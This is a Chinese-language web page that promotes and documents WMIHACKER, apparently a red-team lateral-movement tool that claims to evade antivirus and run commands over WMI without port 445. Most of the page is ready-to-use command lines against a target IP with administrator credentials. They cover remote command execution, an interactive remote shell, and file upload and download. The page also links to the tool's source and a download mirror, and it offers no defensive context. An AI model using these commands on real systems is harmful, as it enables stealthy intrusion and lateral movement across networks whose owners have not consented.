WMIHACKER无需445端口进行横向渗透

WMIHACKER无需445端口进行横向渗透

WMIHACKER简介

常见的WMIEXEC,PSEXEC工具执行命令是创建服务或调用Win32_Process.create,这些方法已被防病毒软件100%拦截,因此我创建了WMIHACKER(绕过防病毒软件横向移动命令执行测试工具)[不需要445端口]

主要功能

①命令执行
②文件上传
③文件下载

项目地址

GitHub:
https://github.com/360-Linton-Lab/WMIHACKER

下载地址

①GitHub: WMIHACKER/archive/master.zip
②雨苁网盘:https://w.ddosi.workers.dev

使用方法

C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs

__          ____  __ _____   _    _          _____ _  ________ _____
\ \        / /  \/  |_   _| | |  | |   /\   / ____| |/ /  ____|  __ \
 \ \  /\  / /| \  / | | |   | |__| |  /  \ | |    | ' /| |__  | |__) |
  \ \/  \/ / | |\/| | | |   |  __  | / /\ \| |    |  < |  __| |  _  /
   \  /\  /  | |  | |_| |_  | |  | |/ ____ \ |____| . \| |____| | \ \
    \/  \/   |_|  |_|_____| |_|  |_/_/    \_\_____|_|\_\______|_|  \_\
                              v0.6beta       By. Xiangshan@360RedTeam
Usage:
        WMIHACKER.vbs  /cmd  host  user  pass  command GETRES?

        WMIHACKER.vbs  /shell  host  user  pass

        WMIHACKER.vbs  /upload  host  user  pass  localpath remotepath

        WMIHACKER.vbs  /download  host  user  pass  localpath remotepath

          /cmd          single command mode
          host          hostname or IP address
          GETRES?       Res Need Or Not, Use 1 Or 0
          command       the command to run on remote host

执行命令后显示结果

> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1

执行命令后无结果显示[保存为txt]

> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0

shell模式

> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"

文件上传:将本地calc.exe复制到远程主机c:\ calc.exe

> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"

文件下载:将远程主机calc.exe下载到本地c:\calc.exe

> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"